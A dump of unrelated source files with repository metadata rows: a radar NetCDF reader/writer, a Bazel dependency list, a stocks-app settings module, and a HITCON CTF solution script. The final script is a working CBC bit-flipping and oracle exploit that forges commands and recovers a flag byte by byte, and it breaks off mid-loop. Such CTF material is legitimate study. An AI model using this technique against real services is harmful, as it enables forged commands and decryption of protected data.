NUM_GRID_CELL_COLUMN: numpy.array([], dtype=int),
field_name: numpy.array([])}
else:
sparse_grid_dict = {
GRID_ROW_COLUMN: netcdf_dataset.variables[GRID_ROW_COLUMN_ORIG][:],
GRID_COLUMN_COLUMN:
netcdf_dataset.variables[GRID_COLUMN_COLUMN_ORIG][:],
NUM_GRID_CELL_COLUMN:
netcdf_dataset.variables[NUM_GRID_CELL_COLUMN_ORIG][:],
field_name: netcdf_dataset.variables[field_name_orig][:]}
netcdf_dataset.close()
sparse_grid_table = pandas.DataFrame.from_dict(sparse_grid_dict)
return _remove_sentinels_from_sparse_grid(
sparse_grid_table, field_name=field_name,
sentinel_values=sentinel_values)
def read_data_from_full_grid_file(
netcdf_file_name, metadata_dict, raise_error_if_fails=True):
"""Reads full radar grid from raw (either MYRORSS or MRMS) file.
This file should contain one radar field at one height and valid time.
:param netcdf_file_name: Path to input file.
:param metadata_dict: Dictionary created by `read_metadata_from_raw_file`.
:param raise_error_if_fails: Boolean flag. If True and file cannot be read,
this method will raise an error. If False and file cannot be read, will
return None for all output vars.
:return: field_matrix: M-by-N numpy array with radar field. Latitude
increases while moving up each column, and longitude increases while
moving right along each row.
:return: grid_point_latitudes_deg: length-M numpy array of grid-point
latitudes (deg N). This array is monotonically decreasing.
:return: grid_point_longitudes_deg: length-N numpy array of grid-point
longitudes (deg E). This array is monotonically increasing.
"""
error_checking.assert_file_exists(netcdf_file_name)
netcdf_dataset = netcdf_io.open_netcdf(
netcdf_file_name, raise_error_if_fails)
if netcdf_dataset is None:
return None, None, None
field_matrix = netcdf_dataset.variables[
metadata_dict[FIELD_NAME_COLUMN_ORIG]]
netcdf_dataset.close()
min_latitude_deg = metadata_dict[radar_utils.NW_GRID_POINT_LAT_COLUMN] - (
metadata_dict[radar_utils.LAT_SPACING_COLUMN] * (
metadata_dict[radar_utils.NUM_LAT_COLUMN] - 1))
grid_point_latitudes_deg, grid_point_longitudes_deg = (
grids.get_latlng_grid_points(
min_latitude_deg=min_latitude_deg,
min_longitude_deg=
metadata_dict[radar_utils.NW_GRID_POINT_LNG_COLUMN],
lat_spacing_deg=metadata_dict[radar_utils.LAT_SPACING_COLUMN],
lng_spacing_deg=metadata_dict[radar_utils.LNG_SPACING_COLUMN],
num_rows=metadata_dict[radar_utils.NUM_LAT_COLUMN],
num_columns=metadata_dict[radar_utils.NUM_LNG_COLUMN]))
field_matrix = _remove_sentinels_from_full_grid(
field_matrix, metadata_dict[radar_utils.SENTINEL_VALUE_COLUMN])
return (numpy.flipud(field_matrix), grid_point_latitudes_deg[::-1],
grid_point_longitudes_deg)
def write_field_to_myrorss_file(
field_matrix, netcdf_file_name, field_name, metadata_dict,
height_m_asl=None):
"""Writes field to MYRORSS-formatted file.
M = number of rows (unique grid-point latitudes)
N = number of columns (unique grid-point longitudes)
:param field_matrix: M-by-N numpy array with one radar variable at one time.
Latitude should increase down each column, and longitude should increase
to the right along each row.
:param netcdf_file_name: Path to output file.
:param field_name: Name of radar field in GewitterGefahr format.
:param metadata_dict: Dictionary created by either
`gridrad_io.read_metadata_from_full_grid_file` or
`read_metadata_from_raw_file`.
:param height_m_asl: Height of radar field (metres above sea level).
"""
if field_name == radar_utils.REFL_NAME:
field_to_heights_dict_m_asl = (
myrorss_and_mrms_utils.fields_and_refl_heights_to_dict(
field_names=[field_name],
data_source=radar_utils.MYRORSS_SOURCE_ID,
refl_heights_m_asl=numpy.array([height_m_asl])))
else:
field_to_heights_dict_m_asl = (
myrorss_and_mrms_utils.fields_and_refl_heights_to_dict(
field_names=[field_name],
data_source=radar_utils.MYRORSS_SOURCE_ID))
field_name = list(field_to_heights_dict_m_asl.keys())[0]
radar_height_m_asl = field_to_heights_dict_m_asl[field_name][0]
if field_name in radar_utils.ECHO_TOP_NAMES:
field_matrix = METRES_TO_KM * field_matrix
field_name_myrorss = radar_utils.field_name_new_to_orig(
field_name=field_name, data_source_name=radar_utils.MYRORSS_SOURCE_ID)
file_system_utils.mkdir_recursive_if_necessary(file_name=netcdf_file_name)
netcdf_dataset = Dataset(
netcdf_file_name, 'w', format='NETCDF3_64BIT_OFFSET')
netcdf_dataset.setncattr(
FIELD_NAME_COLUMN_ORIG, field_name_myrorss)
netcdf_dataset.setncattr('DataType', 'SparseLatLonGrid')
netcdf_dataset.setncattr(
NW_GRID_POINT_LAT_COLUMN_ORIG, rounder.round_to_nearest(
metadata_dict[radar_utils.NW_GRID_POINT_LAT_COLUMN],
LATLNG_MULTIPLE_DEG))
netcdf_dataset.setncattr(
NW_GRID_POINT_LNG_COLUMN_ORIG, rounder.round_to_nearest(
metadata_dict[radar_utils.NW_GRID_POINT_LNG_COLUMN],
LATLNG_MULTIPLE_DEG))
netcdf_dataset.setncattr(
HEIGHT_COLUMN_ORIG,
METRES_TO_KM * float(radar_height_m_asl))
netcdf_dataset.setncattr(
UNIX_TIME_COLUMN_ORIG,
numpy.int32(metadata_dict[radar_utils.UNIX_TIME_COLUMN]))
netcdf_dataset.setncattr('FractionalTime', 0.)
netcdf_dataset.setncattr('attributes', ' ColorMap SubType Unit')
netcdf_dataset.setncattr('ColorMap-unit', 'dimensionless')
netcdf_dataset.setncattr('ColorMap-value', '')
netcdf_dataset.setncattr('SubType-unit', 'dimensionless')
netcdf_dataset.setncattr('SubType-value', float(radar_height_m_asl))
netcdf_dataset.setncattr('Unit-unit', 'dimensionless')
netcdf_dataset.setncattr('Unit-value', 'dimensionless')
netcdf_dataset.setncattr(
LAT_SPACING_COLUMN_ORIG, rounder.round_to_nearest(
metadata_dict[radar_utils.LAT_SPACING_COLUMN],
LATLNG_MULTIPLE_DEG))
netcdf_dataset.setncattr(
LNG_SPACING_COLUMN_ORIG, rounder.round_to_nearest(
metadata_dict[radar_utils.LNG_SPACING_COLUMN],
LATLNG_MULTIPLE_DEG))
netcdf_dataset.setncattr(
SENTINEL_VALUE_COLUMNS_ORIG[0], numpy.double(-99000.))
netcdf_dataset.setncattr(
SENTINEL_VALUE_COLUMNS_ORIG[1], numpy.double(-99001.))
min_latitude_deg = metadata_dict[radar_utils.NW_GRID_POINT_LAT_COLUMN] - (
metadata_dict[radar_utils.LAT_SPACING_COLUMN] *
(metadata_dict[radar_utils.NUM_LAT_COLUMN] - 1))
unique_grid_point_lats_deg, unique_grid_point_lngs_deg = (
grids.get_latlng_grid_points(
min_latitude_deg=min_latitude_deg,
min_longitude_deg=
metadata_dict[radar_utils.NW_GRID_POINT_LNG_COLUMN],
lat_spacing_deg=metadata_dict[radar_utils.LAT_SPACING_COLUMN],
lng_spacing_deg=metadata_dict[radar_utils.LNG_SPACING_COLUMN],
num_rows=metadata_dict[radar_utils.NUM_LAT_COLUMN],
num_columns=metadata_dict[radar_utils.NUM_LNG_COLUMN]))
num_grid_rows = len(unique_grid_point_lats_deg)
num_grid_columns = len(unique_grid_point_lngs_deg)
field_vector = numpy.reshape(field_matrix, num_grid_rows * num_grid_columns)
grid_point_lat_matrix, grid_point_lng_matrix = (
grids.latlng_vectors_to_matrices(
unique_grid_point_lats_deg, unique_grid_point_lngs_deg))
grid_point_lat_vector = numpy.reshape(
grid_point_lat_matrix, num_grid_rows * num_grid_columns)
grid_point_lng_vector = numpy.reshape(
grid_point_lng_matrix, num_grid_rows * num_grid_columns)
real_value_indices = numpy.where(numpy.invert(numpy.isnan(field_vector)))[0]
netcdf_dataset.createDimension(
NUM_LAT_COLUMN_ORIG, num_grid_rows - 1)
netcdf_dataset.createDimension(
NUM_LNG_COLUMN_ORIG, num_grid_columns - 1)
netcdf_dataset.createDimension(
NUM_PIXELS_COLUMN_ORIG, len(real_value_indices))
row_index_vector, column_index_vector = radar_utils.latlng_to_rowcol(
grid_point_lat_vector, grid_point_lng_vector,
nw_grid_point_lat_deg=
metadata_dict[radar_utils.NW_GRID_POINT_LAT_COLUMN],
nw_grid_point_lng_deg=
metadata_dict[radar_utils.NW_GRID_POINT_LNG_COLUMN],
lat_spacing_deg=metadata_dict[radar_utils.LAT_SPACING_COLUMN],
lng_spacing_deg=metadata_dict[radar_utils.LNG_SPACING_COLUMN])
netcdf_dataset.createVariable(
field_name_myrorss, numpy.single, (NUM_PIXELS_COLUMN_ORIG,))
netcdf_dataset.createVariable(
GRID_ROW_COLUMN_ORIG, numpy.int16, (NUM_PIXELS_COLUMN_ORIG,))
netcdf_dataset.createVariable(
GRID_COLUMN_COLUMN_ORIG, numpy.int16, (NUM_PIXELS_COLUMN_ORIG,))
netcdf_dataset.createVariable(
NUM_GRID_CELL_COLUMN_ORIG, numpy.int32, (NUM_PIXELS_COLUMN_ORIG,))
netcdf_dataset.variables[field_name_myrorss].setncattr(
'BackgroundValue', numpy.int32(-99900))
netcdf_dataset.variables[field_name_myrorss].setncattr(
'units', 'dimensionless')
netcdf_dataset.variables[field_name_myrorss].setncattr(
'NumValidRuns', numpy.int32(len(real_value_indices)))
netcdf_dataset.variables[field_name_myrorss][:] = field_vector[
real_value_indices]
netcdf_dataset.variables[GRID_ROW_COLUMN_ORIG][:] = (
row_index_vector[real_value_indices])
netcdf_dataset.variables[GRID_COLUMN_COLUMN_ORIG][:] = (
column_index_vector[real_value_indices])
netcdf_dataset.variables[NUM_GRID_CELL_COLUMN_ORIG][:] = (
numpy.full(len(real_value_indices), 1, dtype=int))
netcdf_dataset.close()
| 42.365854
| 80
| 0.731041
| 5,447
| 38,214
| 4.69139
| 0.07729
| 0.030289
| 0.023284
| 0.030132
| 0.650231
| 0.531619
| 0.463724
| 0.418486
| 0.366322
| 0.326955
| 0
| 0.006491
| 0.197781
| 38,214
| 901
| 81
| 42.412875
| 0.827081
| 0.26506
| 0
| 0.240672
| 0
| 0.005597
| 0.036817
| 0.007334
| 0
| 0
| 0
| 0.00111
| 0.031716
| 1
| 0.026119
| false
| 0
| 0.029851
| 0
| 0.089552
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
1
| 0
|
ee6793056d92226902cff484562e9055263810e1
| 10,325
|
bzl
|
Python
|
config/bazel/repositories.bzl
|
nala-cub/coda
|
581608cfc4d9b485182c6f5f40dd2ab7540cec66
|
[
"Apache-2.0"
] | 1
|
2021-11-13T06:19:22.000Z
|
2021-11-13T06:19:22.000Z
|
config/bazel/repositories.bzl
|
nala-cub/coda
|
581608cfc4d9b485182c6f5f40dd2ab7540cec66
|
[
"Apache-2.0"
] | 1
|
2021-12-21T17:56:58.000Z
|
2021-12-21T18:16:27.000Z
|
config/bazel/repositories.bzl
|
nala-cub/coda
|
581608cfc4d9b485182c6f5f40dd2ab7540cec66
|
[
"Apache-2.0"
] | null | null | null |
# Copyright 2021 Cory Paik. All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
# ==============================================================================
""" Research repositories """
load("//tools:maybe_http.bzl", "http_archive")
def _clean_dep(x):
return str(Label(x))
def _py_repositories():
http_archive(
name = "pytoolz_toolz",
build_file = _clean_dep("//third_party:toolz.BUILD"),
sha256 = "5c6ebde36ec2ceb9d6b3946105ba10b25237a67daee4eb80d62c508b9c4c2f55",
strip_prefix = "toolz-0.11.1",
urls = [
"https://github.com/pytoolz/toolz/archive/0.11.1.tar.gz",
],
)
http_archive(
name = "pytoolz_cytoolz",
build_file = _clean_dep("//third_party:cytoolz.BUILD"),
sha256 = "dba4a9d95e49f4f3cb5c41937f55dffe600aca5a7e640e3c2a56d9224923d7bb",
strip_prefix = "cytoolz-0.11.0",
urls = [
"https://github.com/pytoolz/cytoolz/archive/0.11.0.tar.gz",
],
)
http_archive(
name = "dm_tensor_annotations",
build_file = _clean_dep("//third_party:tensor_annotations.BUILD"),
patch_args = ["-p1"],
patches = [Label("//third_party:tensor_annotations.patch")],
sha256 = "d0a932efa70b1465860b14b5bbaf9b8eae8666133b28e74eaebdec9f30053f39",
strip_prefix = "tensor_annotations-b24a6213d20e806d9f06f4af9e0c0d1707b26d3e",
urls = [
"https://github.com/deepmind/tensor_annotations/archive/b24a6213d20e806d9f06f4af9e0c0d1707b26d3e.tar.gz",
],
)
http_archive(
name = "python_typeshed",
build_file = _clean_dep("//third_party:typeshed.BUILD"),
sha256 = "804110a0f0224f9f59d1854e6e9dd20157a899fcf1cd61f2376f29e2663a6c3e",
strip_prefix = "typeshed-53087be4eb935e5db24e9dddad3567ecaf1909a7",
urls = [
"https://github.com/python/typeshed/archive/53087be4eb935e5db24e9dddad3567ecaf1909a7.tar.gz",
],
)
http_archive(
name = "dm_rlax",
build_file = _clean_dep("//third_party:rlax.BUILD"),
sha256 = "d2283be962dc697882ff371813c64220a2c34a5538ca017d5bf699848426be3f",
strip_prefix = "rlax-4e8aeed362d65ebb80bac162f09994c322c966a1",
urls = ["https://github.com/deepmind/rlax/archive/4e8aeed362d65ebb80bac162f09994c322c966a1.tar.gz"],
)
http_archive(
name = "dm_optax",
build_file = _clean_dep("//third_party:optax.BUILD"),
sha256 = "39a48c13be5e8259656dc7ed613dceaea9b205e1927b8b87db3c0e8181f18739",
strip_prefix = "optax-0.0.9",
urls = ["https://github.com/deepmind/optax/archive/v0.0.9.tar.gz"],
)
http_archive(
name = "dm_chex",
build_file = _clean_dep("//third_party:chex.BUILD"),
sha256 = "d6a2410d77879e0f768cb0796f3156c78627a28ef6362ac725582b77af32ca64",
strip_prefix = "chex-fb7924766dec32cc9201149b66908545b44d03a9",
urls = ["https://github.com/deepmind/chex/archive/fb7924766dec32cc9201149b66908545b44d03a9.tar.gz"],
)
http_archive(
name = "com_google_flax",
build_file = _clean_dep("//third_party:flax.BUILD"),
sha256 = "b0da699b317fe028f6b0ae94174ec0a17ca376a79ca0a48e5b106ee7070d849c",
strip_prefix = "flax-0.3.5",
urls = ["https://github.com/google/flax/archive/v0.3.5.tar.gz"],
)
http_archive(
name = "dm_tree",
build_file = _clean_dep("//third_party:tree.BUILD"),
sha256 = "542449862e600e50663128a31cd4e262880f423f8bc66a64748f9bb20762cfbe",
strip_prefix = "tree-42e87fda83278e2eb32bb55225e1d1511e77c10c",
urls = ["https://github.com/deepmind/tree/archive/42e87fda83278e2eb32bb55225e1d1511e77c10c.tar.gz"],
)
http_archive(
name = "dm_fancyflags",
build_file = _clean_dep("//third_party:fancyflags.BUILD"),
sha256 = "19805c12d7512c9e2806c0a6fea352381b4718e25d94d94960e8f3e61e3e4ab2",
strip_prefix = "fancyflags-2e13d9818fb41dbb4476c4ebbcfe5f5a35643ef0",
url = "https://github.com/deepmind/fancyflags/archive/2e13d9818fb41dbb4476c4ebbcfe5f5a35643ef0.tar.gz",
)
http_archive(
name = "hf_transformers",
build_file = _clean_dep("//third_party/py:transformers.BUILD"),
patch_args = ["-p1"],
patches = [_clean_dep("//third_party/py:transformers.patch")],
sha256 = "30d9e30583e47680fd7b9809138c4cd83166fa0770f0113a1e06c3f65b848b4d",
strip_prefix = "transformers-4.10.3",
urls = [
"https://github.com/huggingface/transformers/archive/v4.10.3.tar.gz",
],
)
def _coda_repositories():
http_archive(
name = "com_github_openai_clip",
build_file = _clean_dep("//third_party:clip.BUILD"),
sha256 = "8949674a42169c92bd1b280b895a8ecdd7e3fe922878f0d8ea8521e09b9e5141",
strip_prefix = "CLIP-e184f608c5d5e58165682f7c332c3a8b4c1545f2",
urls = ["https://github.com/openai/CLIP/archive/e184f608c5d5e58165682f7c332c3a8b4c1545f2.tar.gz"],
)
http_archive(
name = "com_github_willwhitney_reprieve",
build_file = _clean_dep("//third_party:reprieve.BUILD"),
sha256 = "5d8e3ae90582a82f5e1f9dc65b007e9556048c2c728e85c8c4d80fa82258794a",
strip_prefix = "reprieve-004e09a37e3c595c450ab05342cd779fa28be462",
urls = ["https://github.com/willwhitney/reprieve/archive/004e09a37e3c595c450ab05342cd779fa28be462.tar.gz"],
)
def research_repositories():
""" Research repositories """
# Override tensorflow @rules_python version. As of 2021-09-21, the only
# target for which tensorflow uses @rules_python is:
# @org_tensorflow//tensorflow/platform/python/platform:platform
# This uses @rules_python//python/runfiles, which still exists in v0.4.0.
http_archive(
name = "rules_python",
sha256 = "954aa89b491be4a083304a2cb838019c8b8c3720a7abb9c4cb81ac7a24230cea",
urls = [
"https://mirror.bazel.build/github.com/bazelbuild/rules_python/releases/download/0.4.0/rules_python-0.4.0.tar.gz",
"https://github.com/bazelbuild/rules_python/releases/download/0.4.0/rules_python-0.4.0.tar.gz",
],
)
############################################################################
# JAX & Tensoflow
http_archive(
name = "org_tensorflow",
patch_args = ["-p1"],
patches = [
"@com_google_jax//third_party:tensorflow.patch",
Label("//third_party:tensorflow-sqlite.patch"),
Label("//third_party:tensorflow-pyconfig.patch"),
],
sha256 = "6b14b66a74728736359afcb491820fa3e713ea4a74bff0defe920f3453a3a0f0",
strip_prefix = "tensorflow-b5b1ff47ad250c3e38dcadef5f6bc414b0a533ee",
urls = [
"https://github.com/tensorflow/tensorflow/archive/b5b1ff47ad250c3e38dcadef5f6bc414b0a533ee.tar.gz",
],
)
http_archive(
name = "com_google_jax",
sha256 = "a2f6e35e0d1b5d2bed88e815d27730338072601003fce93e6c49442afa3d8d96",
strip_prefix = "jax-c3bacb49489aac6eb565611426022b3dd2a430fa",
urls = [
"https://github.com/corypaik/jax/archive/c3bacb49489aac6eb565611426022b3dd2a430fa.tar.gz",
],
)
############################################################################
http_archive(
name = "bazel_gazelle",
sha256 = "62ca106be173579c0a167deb23358fdfe71ffa1e4cfdddf5582af26520f1c66f",
urls = [
"https://mirror.bazel.build/github.com/bazelbuild/bazel-gazelle/releases/download/v0.23.0/bazel-gazelle-v0.23.0.tar.gz",
"https://github.com/bazelbuild/bazel-gazelle/releases/download/v0.23.0/bazel-gazelle-v0.23.0.tar.gz",
],
)
http_archive(
name = "com_github_bazelbuild_buildtools",
sha256 = "b8b69615e8d9ade79f3612311b8d0c4dfe01017420c90eed11db15e9e7c9ff3c",
strip_prefix = "buildtools-4.2.1",
url = "https://github.com/bazelbuild/buildtools/archive/4.2.1.tar.gz",
)
# we rely on dbx_build_tools for the built-in python interpreter deps.
http_archive(
name = "dbx_build_tools",
patch_args = ["-p1"],
sha256 = "151b77cf5d1b06884bc2da350322e33ef5289237622196467988894c57616a0c",
strip_prefix = "dbx_build_tools-a5ae53031f11d9114cdbc40da8a84b5d28af58f7",
urls = ["https://github.com/dropbox/dbx_build_tools/archive/a5ae53031f11d9114cdbc40da8a84b5d28af58f7.tar.gz"],
)
http_archive(
name = "facebook_zstd",
build_file_content = """exports_files(["zstd"])""",
patch_cmds = ["make zstd"],
sha256 = "5194fbfa781fcf45b98c5e849651aa7b3b0a008c6b72d4a0db760f3002291e94",
strip_prefix = "zstd-1.5.0",
urls = ["https://github.com/facebook/zstd/releases/download/v1.5.0/zstd-1.5.0.tar.gz"],
)
http_archive(
name = "io_bazel_stardoc",
sha256 = "cd3d1e483eddf9f73db2bd466f329e1d10d65492272820eda57540767c902fe2",
strip_prefix = "stardoc-0.5.0",
urls = ["https://github.com/bazelbuild/stardoc/archive/0.5.0.tar.gz"],
)
# Overwrite @dbx_build_tools version of cpython3.8. Note that we use the
# same version, just with a different BUILD file. We could (and used to)
# just use a patch, but it became frustrating to make fixes, and we'd like
# to avoid having yet another submodule.
http_archive(
name = "org_python_cpython_38",
build_file = _clean_dep("//third_party/cpython:python38.BUILD"),
sha256 = "75894117f6db7051c1b34f37410168844bbb357c139a8a10a352e9bf8be594e8",
strip_prefix = "Python-3.8.1",
urls = ["https://www.python.org/ftp/python/3.8.1/Python-3.8.1.tar.xz"],
)
_py_repositories()
# for specific projects
_coda_repositories()
| 43.200837
| 132
| 0.670799
| 980
| 10,325
| 6.880612
| 0.240816
| 0.03752
| 0.04894
| 0.04538
| 0.22008
| 0.159128
| 0.067477
| 0.049533
| 0.042118
| 0.042118
| 0
| 0.197186
| 0.194479
| 10,325
| 238
| 133
| 43.382353
| 0.613563
| 0.127554
| 0
| 0.243243
| 0
| 0.07027
| 0.5707
| 0.306724
| 0
| 0
| 0
| 0
| 0
| 1
| 0.021622
| false
| 0
| 0
| 0.005405
| 0.027027
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
1
| 0
|
ee699a71ac54286cafed23dd6c6819d85173b00b
| 3,051
|
py
|
Python
|
app/core/settings/settings.py
|
Radarslan/stocks
|
d0a1ca0808b5ac13c0ade4461832c1fb9bac8f0f
|
[
"MIT"
] | null | null | null |
app/core/settings/settings.py
|
Radarslan/stocks
|
d0a1ca0808b5ac13c0ade4461832c1fb9bac8f0f
|
[
"MIT"
] | null | null | null |
app/core/settings/settings.py
|
Radarslan/stocks
|
d0a1ca0808b5ac13c0ade4461832c1fb9bac8f0f
|
[
"MIT"
] | null | null | null |
import json
import logging
import sys
from decouple import config
# general
ENVIRONMENT: str = config("ENVIRONMENT", "docker")
API_VERSION: str = config("API_VERSION", "/api")
PROJECT_NAME: str = config("PROJECT_NAME", "Stocks")
BACKEND_CORS_ORIGINS: str = config("BACKEND_CORS_ORIGINS", "*")
DATETIME_FORMAT = "%Y-%m-%d %H:%M:%S"
# logging
MILLISECONDS_LENGTH = 3
MODULE_NAME_LENGTH = 20
LINE_NUMBER_LENGTH = 5
LOGGING_LEVEL_NAME_LENGTH = 8
LOG_FORMAT = (
f"[%(asctime)s"
f".%(msecs){MILLISECONDS_LENGTH}d] "
f"[%(module){MODULE_NAME_LENGTH}s] "
f"[%(lineno){LINE_NUMBER_LENGTH}d] "
f"[%(levelname){LOGGING_LEVEL_NAME_LENGTH}s]: "
f"%(message)s"
)
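# The assembled format is:
# "[%(asctime)s.%(msecs)3d] [%(module)20s] [%(lineno)5d] [%(levelname)8s]: %(message)s"
# so a record renders like (hypothetical values):
# [2021-01-01 12:00:00.123] [            settings] [   42] [   DEBUG]: started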
logging.basicConfig(
datefmt=DATETIME_FORMAT,
format=LOG_FORMAT,
level=logging.DEBUG,
stream=sys.stdout,
force=True,
)
# time periods
HALF_AN_HOUR = 1800
# database
DATABASE_PASSWORD: str = config("DATABASE_PASSWORD", "gibberish")
DATABASE_HOST: str = config(
"DATABASE_HOST", "database" if ENVIRONMENT == "docker" else "127.0.0.1"
)
DATABASE_PORT: int = config("DATABASE_PORT", 5005, cast=int)
DATABASE_NAME: int = config("DATABASE_NAME", 0, cast=int)
TIME_TO_LIVE_IN_SECONDS: int = config(
"TIME_TO_LIVE_IN_SECONDS", HALF_AN_HOUR, cast=int
)
# sockets
BINANCE_WEB_SOCKET_URL: str = config(
"BINANCE_WEB_SOCKET_URL",
"wss://stream.binance.com:9443/stream?streams=!miniTicker@arr",
)
SOCKET_MESSAGE_LENGTH: int = config("SOCKET_MESSAGE_LENGTH", 4096, cast=int)
SOCKET_DISCONNECT_MESSAGE: str = config(
"SOCKET_DISCONNECT_MESSAGE", "DISCONNECTED!"
)
ENCODING_FORMAT: str = "utf-8"
LOCAL_APP_CFG = """
{
"SOCKET_CONNECTIONS": [
{
"url_slug": "dxfeed",
"source_type": "dxfeed",
"HOST": "127.0.0.1",
"PORT": 1234
},
{
"url_slug": "dxfeed",
"source_type": "mc_fix",
"HOST": "127.0.0.1",
"PORT": 4321
}
]
}
"""
LOCAL_APP_CFG = """
{
"SOCKET_CONNECTIONS": [
{
"url_slug": "dxfeed",
"source_type": "dxfeed",
"HOST": "127.0.0.1",
"PORT": 1234
},
{
"url_slug": "dxfeed",
"source_type": "mc_fix",
"HOST": "127.0.0.1",
"PORT": 4321
}
]
}
"""
APP_CFG = config("APP_CFG", LOCAL_APP_CFG)
try:
if ENVIRONMENT == "localhost":
SOCKET_CONNECTIONS = json.loads(LOCAL_APP_CFG).get(
"SOCKET_CONNECTIONS"
)
else:
SOCKET_CONNECTIONS = json.loads(APP_CFG).get("SOCKET_CONNECTIONS")
SOCKET_SOURCE_TYPES = {
f"{connection.get('PORT')}": connection.get("source_type")
for connection in SOCKET_CONNECTIONS
}
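# e.g. {"1234": "dxfeed", "4321": "mc_fix"} for the LOCAL_APP_CFG above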
except Exception as e:
logging.error("failed to get socket connections configuration")
logging.error(e)
sys.exit(1)
# data validation
ASSET_DECIMAL_PLACES = 10
| 25.855932
| 76
| 0.59587
| 356
| 3,051
| 4.837079
| 0.342697
| 0.041812
| 0.014518
| 0.017422
| 0.192799
| 0.140534
| 0.140534
| 0.140534
| 0.140534
| 0.140534
| 0
| 0.032129
| 0.265487
| 3,051
| 117
| 77
| 26.076923
| 0.736278
| 0.019993
| 0
| 0.22
| 0
| 0
| 0.488099
| 0.119343
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| false
| 0.01
| 0.04
| 0
| 0.04
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
1
| 0
|
ee6e8e289a9de7e4f9d0b9c903a761ab4c91411d
| 4,049
|
py
|
Python
|
Gathered CTF writeups/2017-11-04-hitcon/secret_server/attack.py
|
mihaid-b/CyberSakura
|
f60e6b6bfd6898c69b84424b080090ae98f8076c
|
[
"MIT"
] | 1
|
2022-03-27T06:00:41.000Z
|
2022-03-27T06:00:41.000Z
|
Gathered CTF writeups/2017-11-04-hitcon/secret_server/attack.py
|
mihaid-b/CyberSakura
|
f60e6b6bfd6898c69b84424b080090ae98f8076c
|
[
"MIT"
] | null | null | null |
Gathered CTF writeups/2017-11-04-hitcon/secret_server/attack.py
|
mihaid-b/CyberSakura
|
f60e6b6bfd6898c69b84424b080090ae98f8076c
|
[
"MIT"
] | 1
|
2022-03-27T06:01:42.000Z
|
2022-03-27T06:01:42.000Z
|
import base64
import hashlib
import re
import string
import itertools
from crypto_commons.netcat.netcat_commons import receive_until_match, nc, send, receive_until
from crypto_commons.symmetrical.symmetrical import set_byte_cbc, set_cbc_payload_for_block
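# Proof-of-work: brute-force a 4-character alphanumeric prefix whose SHA256,
# together with the server-supplied suffix, matches the given digest
# (at most 62**4, about 14.8M, candidates).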
def PoW(suffix, digest):
for prefix in itertools.product(string.ascii_letters + string.digits, repeat=4):
p = "".join(prefix)
if hashlib.sha256(p + suffix).hexdigest() == digest:
return p
def pad(msg):
pad_length = 16 - len(msg) % 16
return msg + chr(pad_length) * pad_length
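# CBC malleability: XOR-ing a chosen difference into ciphertext block i
# flips the same bits in decrypted plaintext block i+1, so knowing the old
# plaintext of a block lets us rewrite it to an arbitrary command.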
def generate_payload_from_message(encrypted, plaintext, new_payload):
raw = encrypted.decode("base64")
new_payload = pad(new_payload)[:16]
plaintext = ("\0" * 16) + (pad(plaintext)[:16])
payload = set_cbc_payload_for_block(raw, plaintext, new_payload, 1)
return base64.b64encode(payload)
def main():
s = nc("52.193.157.19", 9999)
data = receive_until_match(s, "Give me XXXX:")
inputs = re.findall("SHA256\(XXXX\+(.*)\) == (.*)", data)[0]
suffix = inputs[0]
digest = inputs[1]
result = PoW(suffix, digest)
print("PoW done")
send(s, result)
receive_until_match(s, "Done!\n")
welcome = receive_until(s, "\n")[:-1]
get_flag_payload = generate_payload_from_message(welcome, "Welcome!", "get-flag")
send(s, get_flag_payload)
encrypted_flag = receive_until(s, "\n")[:-1]
raw_enc_flag = encrypted_flag.decode("base64")
current = "hitcon{"
print('encrypted flag', encrypted_flag, encrypted_flag.decode("base64"), len(encrypted_flag.decode("base64")))
for block_to_recover in range(3):
malleable_block = base64.b64encode(raw_enc_flag[block_to_recover * 16:])
missing = 16 - len(current)
for spaces in range(missing):
for c in string.printable:
test_flag_block_prefix = current + c + ("\0" * (missing - spaces))
expected_command = (" " * spaces) + "get-flag"
payload = generate_payload_from_message(malleable_block, test_flag_block_prefix, expected_command)
send(s, payload)
result = receive_until(s, "\n")[:-1]
if result == encrypted_flag:
current += c
print('found matching flag char:', current)
break
print(current)
known_blocks = raw_enc_flag[16 * block_to_recover:16 * block_to_recover + 32]
expanded_flag = raw_enc_flag[16 * block_to_recover:] + known_blocks # appending IV and "Welcome!!" at the end
next_block_known = ""
for i in range(8):
get_md5 = set_cbc_payload_for_block(expanded_flag, "\0" * 16 + current, (" " * 9) + "get-md5", 1) # first block is get-md5
get_md5 = set_byte_cbc(get_md5, ("\0" * (5 - block_to_recover) * 16) + current,
(6 - block_to_recover) * 16 - 1, chr((4 - block_to_recover) * 16 - i - 1)) # last character to cut padding
send(s, base64.b64encode(get_md5))
real_md5_result = receive_until(s, "\n")[:-1]
for c in string.printable:
test_md5_payload = set_cbc_payload_for_block(expanded_flag, "\0" * 16 + current,
(" " * (8 - i - 1)) + "get-md5" + next_block_known + c, 1)
test_md5_payload = set_byte_cbc(test_md5_payload, ("\0" * (5 - block_to_recover) * 16) + current,
(6 - block_to_recover) * 16 - 1,
chr((4 - block_to_recover) * 16 + 1))
send(s, base64.b64encode(test_md5_payload))
test_md5_result = receive_until(s, "\n")[:-1]
if real_md5_result == test_md5_result:
next_block_known += c
